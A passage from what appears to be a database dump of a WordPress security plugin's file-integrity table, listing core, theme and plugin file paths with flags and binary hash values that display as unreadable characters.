�pe�','wp-includes/blocks/video/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(�}\"y�����)��','�5���@����^��l�\r�!\ZK�� r','',0,'?'),('ˍD{�mm�PtO��','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/README.md',0,'Y��ϛ�vj��\n���','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('ˍ�G䯀oe���o�','wp-includes/js/shortcode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�������P}�SΊ','yae�aK��R�\0%��xy��u�y�↢','',0,'?'),('ˏ|D�c�,�Z��','wp-content/plugins/wp-smushit/core/external/plugin-notice/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z�r�]q�Z��','��SS.�J3�F8	��j�`�\'HE2���͐','',0,'?'),('ˏ�s6�L�,5I&&Z','wp-includes/wp-includes/js/dist/warning.min.js',0,'�@AUV����x��\0�','�@AUV����x��\0�','%|�l��U}}�@~�\\<��#��x�9�a\n��','',0,'?'),('˓^Q���|bx�f^�','wp-content/plugins/wordpress-seo/src/presenters/url-list-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ø���eyI���T|%x','�U����-�MŇ�٠G��j�v��0>����%�','',0,'?'),('ˠ�����U�������','wp-content/themes/hitmag/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�\'i�av�˺��>v','ή�$7@6\rZT���8�}_}L@�ĥ�.z�e�','',0,'?'),('ˤԐ�{%k�#�f�','wp-includes/js/mediaelement/wp-playlist.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hjl�����6','v�������p~��Z]���r$�+�%�x','',0,'?'),('˩C�@�����\\��','wp-includes/wp-includes/js/dist/components.js',0,'\Z�^�}!��〼����','\Z�^�}!��〼����','Ƽy�e�s�<���z�E�,_:�<E�	=�+�.','',0,'?'),('˸nQ=pF+*D~�]�5','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/container/src/NotFoundExceptionInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|{!C���\Z�.','�yZ��<��U\"�笒Y)\'\nt��iF����N�','',0,'?'),('˼�.L�*IJ��w�A','wp-content/plugins/wp-smushit/_src/react/views/webp/steps-bar.jsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#O�h8�J���f','���Dm^K���z�vI��[\'7��F�t:� ','',0,'?'),('�ǝ��Q��_y�d��+�','wp-includes/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��U iU0�ll9�c','��_�v$�U7_�*\r?�+�^��≾�Ā','',0,'?'),('��O[��Ї��t�','wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Թ���Xp`me<','wP\0�p�zuYDS�z(W�ߥ��P�3$S����','',0,'?'),('���N��\0��ܹ�t','wp-includes/js/jquery/ui/spinner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r�O���Q1���','��-�7���@i?҆8�3~�gXV�{�','',0,'?'),('�����k2�nŒ���','wp-content/plugins/wp-cerber/cerber-scanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}Iw��	��@+�<0','-�(/�;���`clM12&�G!�w�e�7��6','',0,'?'),('��YA�m���<S�9','wp-content/plugins/wordpress-seo/src/integrations/admin/addon-installation/dialog-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̒�n�nZ����X{\'','����؟[��Ū�\"\05�rm}�5]g����su','',0,'?'),('��d�I�Kƹ�v\Z�0�','wp-content/plugins/wordpress-seo/admin/views/user-profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dl��1�{ᛛe�Xs','U�G����L<�Y���\r���s�u���0�','',0,'?'),('��v�E,�-O�{���','wp-includes/link-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Zr���!��ĕtܭ��','m9665?%o�$�G�f\r�S���)Y�Y���]','',0,'?'),('��o���?��ݬ���','wp-content/plugins/wp-cerber/assets/icons/fonts/crb.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w���Nw�?���Z��','�u,^�~�U�H&	GwɢӴJ5V�x��$���)','',0,'?'),('�!�LT�3��i��x�','wp-admin/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�h���7�����{�','뎾WV�$�p4mY�w�W����*�!�','',0,'?'),('�-�+N�>Ĕ��ђ','wp-includes/wp-includes/images/blank.gif',0,'��ʟg��h�kK��f','��ʟg��h�kK��f','>��E�G��L�� E��JQ���|�B���ij�','',0,'?'),('�/�}��¦��kA�Zj','wp-includes/blocks/query-pagination/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R;�4F��O�0�_4#�','��\Z�e�l.\\���ê�u/\rT6�>�mo�Z��','',0,'?'),('�=`�:������x~��','wp-includes/blocks/site-logo/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z9�,(�1�1�Z�','<�s�i6+�΃�����n��q�fխ��','',0,'?'),('�M�Tq&[?��>칊�\n','wp-admin/css/colors/ectoplasm/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�0�|G�%��tj��','�@z\ZU�<�EOb�qکo��v�ۭPq\0�i:','',0,'?'),('�M����z�ŭY���','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�J��u;Q�Z6��','����\\MU��KhQ�w�C��i�V���J\'','',0,'?'),('�Vd	]�=M[[ٿ���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-permanent-blocked-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�Q��^К����','�BS�?jP����0h~q��G�^K�ew�vO','',0,'?'),('�V�ڮ����M��jӁ','wp-includes/js/plupload/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u&\n�TI�z����+�','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('�a$�:�4j�\0�\ZX�','wp-includes/blocks/comment-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';R9ApQ�	Y�m)=�',',�;#��:Xb$���1�����V-�YR#HUW�','',0,'?'),('�l{�Y�H�&��<ۏ�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php',0,'�[\0a�C����J�','�[\0a�C����J�','��g4W\"3~U��Ӕ�,=$\'���W�S9����','',0,'?'),('�z4�)�-E�ɽ�','wp-includes/wp-includes/images/wlw/wp-icon.png',0,'1	�ʚ�7w3K��*','1	�ʚ�7w3K��*','5 ��}�x(��r�:a,zmK�H1|/��+��','',0,'?'),('���i��n�j/�r��','wp-includes/js/dist/i18n.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�֖PT��O��I��sy','\02�#_�ŕvqsf\"\nXx��k�`_���2ZGQc','',0,'?'),('́ԑ�A�Ha]�\':�','wp-includes/blocks/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ь��ߟ���7.ms','����\'�:�XC���Rj�j�����^�','',0,'?'),('̅�{�愵�q�I6��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/UriResolver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fzڨT�p�7b%K�\nI','I#Yv~j���Uڿ&��\Z�5�xTH�X�`�b','',0,'?'),('̋��q�B3a�Y��-�','wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0`\'}�(���b���A#','c,�Bp�2�8���0j��7}hp-��宆','',0,'?'),('̖���ɲ����e�R�!','wp-includes/wp-includes/js/dist/rich-text.min.js',0,'Y�����Lc#Ul6��E','Y�����Lc#Ul6��E','C��7�CG��,A�b�c�j*�jF�i�!��c!V','',0,'?'),('̙~�Ȍî+���byȁ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�숊z��;5!��','�D�\Z���L�ޠΔa��]n�\n���L&�\n','',0,'?'),('̟�n�VڰP*x�zy�','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/post_type/post-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�i���/Po�+���','�0H����4�U��+�_mz�y��>o��{t�','',0,'?'),('̮����Ke}��c�\Z�','wp-content/plugins/wp-fastest-cache/images/icon-32x32.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�l����*49>�)}j','�R�m�&ʢ�;�߼@-U�<�H�Ʉ�9<��','',0,'?'),('̸����-]\Z���n�','wp-includes/sodium_compat/src/Core/Ristretto255.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k9�wZ��~�� ��\'',' z�`WN?]�ӟ�B,K���Jl��W��>k�','',0,'?'),('���8�U����F���','wp-includes/wp-includes/nav-menu-template.php',0,'JI1E%g䅝�?�&�','JI1E%g䅝�?�&�','AS%�³�[�|ZJf�RH3#Bl�K��zH','',0,'?'),('�Ê5ff�;,G!\'��\'-','wp-admin/css/colors/ocean/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{Ȕ����⩆','�*c�v��0��/��Q��f�4\'����\\','',0,'?'),('�����\";+�\rxu���w','wp-includes/js/mediaelement/renderers/vimeo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�~s���i6G�/','��{����w��-\r����zF�v_��\\wf���','',0,'?'),('�NJ�E�v�c,�صyS^','wp-includes/images/crystal/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�Lc�iG�fQ�\r��','v��pm��c�6�Y~\",!V��EXl�l�\"z�','',0,'?'),('��M\\U2�����x]{8','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/PromiseInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������&Y�~�k�h','��(E�k��^��~��qhm��	=�uC[���7','',0,'?'),('�\rZ\0�J=\Z��nk�','wp-content/plugins/wordpress-seo/admin/menu/class-base-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؚ���Egk�r\r7��','\\�V�H��N~7��a	�����Cu���\0��','',0,'?'),('�#\Z_U�P��\0�h','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php',0,'�F�S:&\0��>f�\\�','�F�S:&\0��>f�\\�','�l�/r+���j�EQ�n��ھ�y�~Q�','',0,'?'),('�?�Ъ=������','wp-content/plugins/wp-fastest-cache/css/fonts/statics/flaticon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B=���-�M����','��=�1n�#��z��*jGƤ�)g��J�PHr��','',0,'?'),('��ѲoQ���Cv4�','wp-content/plugins/wp-smushit/app/views/settings/general-meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x����v���D�#��','��:!Ƣ�}rkukKI~�l��y��݆�C��','',0,'?'),('�߮��*�P�q[�','wp-content/plugins/wordpress-seo/vendor/composer/InstalledVersions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�Y��x\"�/>��c�','K��C�m���H��p�y��\rt�l�S��8','',0,'?'),('�2>��:mz=	6٣;�','wp-includes/blocks/comment-edit-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�3m�!���۹','�餂1�.�hޫ��x߾_��o߲ۑw�Mm','',0,'?'),('����p�j֛`��w','wp-admin/css/customize-controls-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\\Є{�;x�\rj','��w�8�7�#@��x?A�y0�{��Z��','',0,'?'),('�v�S�u�P�G��>','wp-content/plugins/wp-cerber/assets/flags/ir.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g\\O�r|�>7�','�s��^5`^I��VeS�{��b�I����s','',0,'?'),('��{��%(���Qoj�','wp-content/plugins/wordfence/css/diff.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܀g	��	�$���`r�Q','��$��hEJ^54<$�ӭYc���’�&','',0,'?'),('�d���lP�O�I�','wp-admin/network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s1I\\~jG(��e���e','8R€���	������\\]L��R6X\Z`\'�','',0,'?'),('�)����\0�e�_�5=�','wp-content/plugins/wordfence/lib/diffResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�Q ����f��7�F','�Ҏ��E����؊>^!j��\0O���ca��^��','',0,'?'),('�+�H��P<�=��|��','wp-content/themes/hitmag/inc/customizer/kirki-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H���tbOC\n��{V(','�E���v�K5�=�bz#�1��3�<}�2�\"','',0,'?'),('�4g�43�!�B\\ꟑ�','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-readability.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����j�fK_e�Rݜs','���w2�)�##F��V���}ք� ���','',0,'?'),('�K=�X�a:�\'5�','wp-includes/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-p����\0E�cb�c�','\"�̘�L���!�{rDnPz^��X�j��Lk','',0,'?'),('�Mu��/t����U\n�','wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-handle-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r\r�2��a\'����','�F�\'+;��/d�3�$˘���	ĺ$~��m','',0,'?'),('�[��o���b$�Ӯz,','wp-includes/wp-includes/css/dist/block-library/style-rtl.css',0,'RV�0 ���*��','RV�0 ���*��','|�ߪYZa3=?\ZK�`��� ��+��-���','',0,'?'),('�^&��`R�y����J','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}n�3;g)���','\nj�^�����C�(��UU�i\'9�O','',0,'?'),('�_g���)پ����{�','wp-content/themes/hitmag/js/jquery.magnific-popup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[#��;jc�t�=�','�{Il�B|<�Ĩ�@Z\'�k)y��_E��Զ����','',0,'?'),('�dy�ɘ3�����','wp-content/plugins/wordpress-seo/src/integrations/front-end/open-graph-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��]��+��� ���',')v��:�0�;�����}m�ж4\0�����D��','',0,'?'),('�m��L0N\"�T~�b�','wp-includes/theme-compat/footer-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z����.�+�j','�i��D�AJ�ψ;v,gc�%���	^#','',0,'?'),('�w�9=�_\"h%��v','wp-admin/css/install-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}#Ta�.���u�','�1��tIx�\0��|I(U��*>�O5�~��Kj��','',0,'?'),('͎3ע�Jyn�ĀM�','wp-content/plugins/wordfence/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nq*��ZF�)2�','�&4\"\rQ�jX�mN\"��?P�o��\\��?���','',0,'?'),('͓�Y�36��l�Y��','wp-includes/js/tinymce/plugins/textcolor/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v�<h������p�','!�/�[I�+\r��G���� Dխ�7�=�����\'','',0,'?'),('ͪu�owsFC�G[c��','wp-includes/rest-api/fields/class-wp-rest-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$5:������~�EU','�s���X����J6���1Ҽ_�E���	�Il��','',0,'?'),('Ͷ�jʃఱ���-�','wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:د_x��O0�8���X','�[�|�r�;�������Ƹ����l�b���	Q','',0,'?'),('ͽ3��=��O�G�|~�','wp-includes/SimplePie/Credit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�6�K>.��L��','r�ٴ��@c�@���{R�CG����d^�>>E\Z','',0,'?'),('��y�Uq���hŝ�','wp-content/plugins/wordpress-seo/inc/class-wpseo-rank.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�[_j��FH;',',�9�<�m_fe\0a�)#�-�0�q�ʥ�iK�Q�1','',0,'?'),('���,���i\\��M�r','wp-content/plugins/wp-smushit/core/class-rest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'A�e���\r�	��','\'�ា֔Z�v`���s��N�	��h1›�#','',0,'?'),('��3�����F�<��8','wp-includes/js/underscore.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�e�<̓��f�44�9','�Vޗ��è_=�V~ ��UWK�OC�\r','',0,'?'),('��S�>s�U)����H','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y$�NX���l��l','[�-���v5<��M\n���+B�u.,�5g','',0,'?'),('���j(g��~jU#��','wp-admin/includes/class-wp-filesystem-ssh2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AۺʀYǪR!7��կ','�}r�31Ҿa����7$@/�\r�W4����','',0,'?'),('��\0�<J6�:��C\n�','wp-content/themes/hitmag/inc/class-meta-boxes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��xZ*f\\)h P','�o���� 8�~��@��7d��6�v�Q,/{Y','',0,'?'),('�u臉�Q�p�0t','wp-content/plugins/wordpress-seo/src/routes/indexing-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����|�ޝD��K��K','E\Z͝�������Ѹy\r,lL�vmzE\Z�H����?','',0,'?'),('�%r&I+�k`�>��','wp-content/plugins/wordpress-seo/src/exceptions/indexable/indexable-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X��@e-X8�.T�','L����o��ۥ��>��?�B̫fR�ۉ\'@�','',0,'?'),('�EiL�+�[��\\{��_','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php',0,'�YA��G=b�u���','�YA��G=b�u���','z�,ͥ���t	<{@Y{�iy��s���c�(S�L','',0,'?'),('�GB�o!��D�k�G��','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-radio-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y���q�΋彘�.','�\0�g����/ [sJ�3�-�@�1��','',0,'?'),('�G�6�&���A��+','wp-content/plugins/redirection/matches/custom-filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z���J{���HZ>��P','Yg=f�-l)jT�����fu\0�ޠ1�9�P','',0,'?'),('�LF��?��t�*Xjp�','wp-includes/wp-includes/js/customize-views.js',0,'\"r�<`����D��','\"r�<`����D��','b2�M��!o�;�-�veq��\\f�]l����:','',0,'?'),('�Y��f/�pw����','wp-includes/Requests/Response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�z)Ue���$t��\r','��;-�f�N��I�Y��Yڲ���e��\r�','',0,'?'),('�_)-�]�ˌkO	��','wp-includes/ID3/module.tag.apetag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӟ�8)��(�ZOV!�','�p�ĞN��W�lѰU!����[dL��I9','',0,'?'),('�l/<��U��ZA��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�Sz�L�HAWr�6~','0��pU���gו�G/���%��\'���Zd�\n\n','',0,'?'),('�|��f�����,2�T	','wp-admin/term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a2�ױw��SF.�����',')i�C����H�35���8����lB{B�f���g','',0,'?'),('΀��-G�*���D1�','wp-content/plugins/wordpress-seo/src/memoizers/meta-tags-context-memoizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#Lz8N��,���K�6*','*����9P���Y�3+l�F�X�S�d.�/�','',0,'?'),('΀�ޱ����D��','wp-includes/wp-includes/functions.wp-scripts.php',0,'�|�4ؒT�$�0B-�','�|�4ؒT�$�0B-�','x�89@��G��#���G�b}y\'�A����v','',0,'?'),('ΝP|�ڒ����\\�o','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �w^��]緣M','����ZE�O�7(�nY��h�˨��','',0,'?'),('άM��w�d��TH��6','wp-includes/wp-includes/customize/class-wp-customize-themes-section.php',0,'��T��vl��3��','��T��vl��3��','�,V���3R�w���.���\r׭+4ݦ`=�`R','',0,'?'),('ΰ���`��3�0','wp-content/plugins/wp-smushit/app/class-abstract-summary-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N~��Ɂ^�\"�)ĉ','�Z��S5���k�!�F#խ]�>�:�$��','',0,'?'),('α�Z	��i�Iȏ�','wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�K�W��w��B�^�','d\r�W�:|[\Z����!��c�9�q�]LH��\\F','',0,'?'),('��D/T�3�D\n�=wP.','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexable-post-type-archive-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(-^��j�!i���f��','�q\0\nP�dʓ���L����>�^�U���\\<��','',0,'?'),('�œ���ϔ�=��#6','wp-admin/images/post-formats32.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WY~�O��{�+_L�kE;','k�<8�._D��K����G[�5e-I(0w��h','',0,'?'),('��5�F�,�Yښ.1�.�','wp-content/plugins/wordpress-seo/images/alert-warning-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WH}�理���Al~','����2̯���%S=�t؈�n��=�Wc','',0,'?'),('���v���p����$','wp-content/themes/hitmag/inc/customizer/assets/imgs/2cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H�l��z���ޝ��','����;���x�6<\Z�\"��Pt�b� l�	','',0,'?'),('��������\n�P','wp-includes/blocks/quote/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�؊���B�0�W�!�','�Tͷe�{����z�A��`[-m�a@�S�0','',0,'?'),('��B�0���i`zz','wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Regular.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']oR��,�K��h`',' P�^b��>\0�W���C�x��2{�F�\"�','',0,'?'),('��,���@���Q�','wp-content/plugins/wordfence/views/common/indeterminate-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��\"�sg�4�\\(�8','�@��Zn\"ξ~�QՔ��8�s�P���\07�3','',0,'?'),('��\n\0�0{�š��','wp-content/plugins/wordpress-seo/src/helpers/post-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~��-U��? ~����','�i:�ԕ��Ѷ�O&5Su8TYº`��{','',0,'?'),('�{$,��\r9j�Y3�','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-es_AR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z���(��$���1�q','�(�z�!��lJ��VTsX	0O08y�x �W��','',0,'?'),('�$o�jJ�AиIβ','wp-content/plugins/wordpress-seo/src/exceptions/oauth/tokens/empty-property-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�����T<���u/t�','�\\$} �g)ni�3̃���ѡ؁���<`�','',0,'?'),('�\'�p�鱇�yw���','wp-content/themes/twentytwentythree/assets/fonts/inter/Inter-VariableFont_slnt,wght.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��De���,�m��','%�b�R447�T��Wz�?�X6�&�����.','',0,'?'),('�-�+�e���m�u\"��x','wp-admin/css/colors/sunrise/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�,/�-��~��<4','���,����\0q�q�H�\r\r�T�}�G�Y<i�9U','',0,'?'),('�26�6�#	S[h(\\��','wp-includes/css/dist/block-library/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>��E*?�T;9WF','73�h�7E.�.�;(}��I�����T�','',0,'?'),('�9�\"�P�m1�%�r.�^','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/Query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(o�h�UQT�G\r�\'','��T8�y�:��a��K�V]�4|�D?��-��','',0,'?'),('�Q�K���Q95�Ɣ`','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>��Y!\\z��JX','��B*yL˰��a��u�\"t�\Z4��Z۳Nk¥','',0,'?'),('�V��M�b��q�x��','wp-content/plugins/wordpress-seo/css/dist/inside-editor-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J\Z����6���ǜ','.TLêr���cB�ݑR�x��ܐ�H���1f','',0,'?'),('�_q ^��<�8��:�	','wp-admin/css/colors/modern/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'eHQ���*Q!�o!','3i��f�`Ϟ��tf�@�Ջ~Qm	�&ŚÀ','',0,'?'),('�c��8��ڲ��$n','wp-content/plugins/wordpress-seo/images/woo_plugin_assistant.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n�q�F0�芼�w','����w�A\0\'Zw	��d=�ؼ]\'ax���B','',0,'?'),('�uF��^G��E+��c','wp-admin/network/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u���6�|��tJ4�1�','��B�;����M�7�߃��[�9�</�','',0,'?'),('π�tGȩ����D','wp-includes/js/tinymce/plugins/image/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\n�4�\\��0�=','Q�v���SI>;4��1�%�rf�$@�p��\\j','',0,'?'),('ϊ=��X���bBz\' �','wp-includes/js/jquery/ui/effect-explode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%���V��zn���Y','��p��^vF�#�����9��s=�ⷸ@�F$�','',0,'?'),('ϊYw�׹��E��G�','wp-includes/blocks/group/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*&Z��e�d8�oͦ','�j1���+?PȕY聿Q��<\r���\\T��','',0,'?'),('ϓ�OD��x���\\�','wp-content/plugins/wp-smushit/_src/js/smush/webp.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�ZZ$0�x�r}','K��3���ZC砃wd���������?K�','',0,'?'),('Ϛ�\"���j�y����^','wp-includes/js/dist/blob.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ef�y��C]��.�ezN','w}K4��i �[��$^����+��eA���9N֯','',0,'?'),('ϝ��4��$��1�_','wp-content/plugins/wp-smushit/app/views/smush-nextgen-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��uv��p*�\r��\Z','Ȅ���0���\",4�:�������:x8b','',0,'?'),('Ϫɶ��T��ȿ&Cw�','wp-includes/wp-includes/customize/class-wp-widget-form-customize-control.php',0,'�{�D*@6�{τ}��','�{�D*@6�{τ}��','�+֓zi���@����^F%5�qZg<��','',0,'?'),('϶c:�{�:˚�y�Wk','wp-content/plugins/disable-gutenberg/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,zY�+���r�}�','UbLE]lԒ%lJ4���k�/�3R���i{�o9�','',0,'?'),('ϼ��\nxԡ��%eB�','wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Light.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���S~�ٽ�CD����','\"�\Z�ۻb����[��$�M�d�/�퍤.�z','',0,'?'),('�����HԹ��f�k�','wp-includes/js/tinymce/wp-tinymce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1_H�0���US��@h�','������_ؕ���N͞����1�*��ǜ��','',0,'?'),('��MЛ��ϣ~&$�','wp-content/plugins/wordpress-seo/src/presenters/open-graph/url-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{4��i�b�T��ڒ','v\ZE;�}7�۰���%`1\'��3-ݡ��x','',0,'?'),('�֎6�